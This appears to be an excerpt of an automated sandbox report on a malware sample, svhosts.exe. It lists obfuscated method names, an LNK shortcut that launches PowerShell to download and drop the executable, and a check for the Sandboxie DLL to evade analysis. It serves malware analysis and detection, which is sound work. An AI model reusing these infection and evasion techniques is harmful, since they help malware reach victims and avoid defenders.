Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, Wed7gG7WlW1qP0WfEkb.cs	High entropy of concatenated method names: 'uDp72ywXQ0', 'BRp70AGGw5', 'JmamsahfBUc4TJDPxd3', 'ObBypqhd95p0IEcVgMe', 'BLgfB5hmVGfLMHDcawR', 'IsoqH9h4gIywuYT5JXc', 'PlEO44hK7yWdDFXvshP', 'adKVrShJ3UlD0pBcsAn', 'mCO2UVhY8DSHJfbiZ15', 'Y4KiZrhvu7j0J732cwS'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, Gdvg3MbodIpgFTnDKf.cs	High entropy of concatenated method names: 'fIRsDHIiK', 'CbOFeNxX2', 'n8jHUT97x', 'F82tl3l4E', 'psW5s6y6UE9bx3pGa27', 'iPRDHAyWK924pLEUFHs', 'bvJf9Yyc2RgjnpErKI1', 'LTsmQHy2GXQidPdiLhq', 'WrMoqLyeuLohPnB1eue', 'xG278RyxNiJU2cHuO4F'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, ecue7q7k9j9d5RyCA8s.cs	High entropy of concatenated method names: 'EZH7NDapNE', 'UcZ7ZGGYQx', 'Ld7qVgRekuTq2w8W55t', 'QAELZ0RxlQAf2DWuv07', 'Ih3lUWR6y3LefwDSo59', 'y5cjriRWCc4sQnWntSl', 'hUpRI4RZiKHZcrwP3I0', 'Tqwq3MRgxbucIgxJweg'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, H0eS3bBbF2S3ec4ioDb.cs	High entropy of concatenated method names: 'fVjsuvdKBn', 'dNRsNVMQOR', 'S9xsZ56j4i', 'frZsgMgiO2', 'F6dse19Bcf', 'UFPsxFQg3B', 't2hs6eRyAX', 'XDcBkNpJHZ', 'SN1sWxg6FF', 'WInsc8CmOi'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, utxMM1A5k5Jqi00NUs.cs	High entropy of concatenated method names: 'mkViRfIX4', 'l8QkN4yrx6HIpU32IZb', 'jHct0fyRbSj6QkmFRex', 'wMijblyhc4YKxXqE3jE', 'vvPFxByq9ifX1AXqq4q', 'PhLbvDyjWIeagcpcGXy', 'g5xEu5yopl5rRR4mhVa', 'vvxoeuyTN1ZBlp5aUFT', 'ijhBtjynAyeN1fJovAO', 'fLloyoyVQ25rA0admlZ'

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Tries to download and execute files (via powershell)

Source: unknown

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\svhosts.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Roaming\svhosts.exe	Memory allocated: 980000 memory reserve \| memory write watch			Jump to behavior
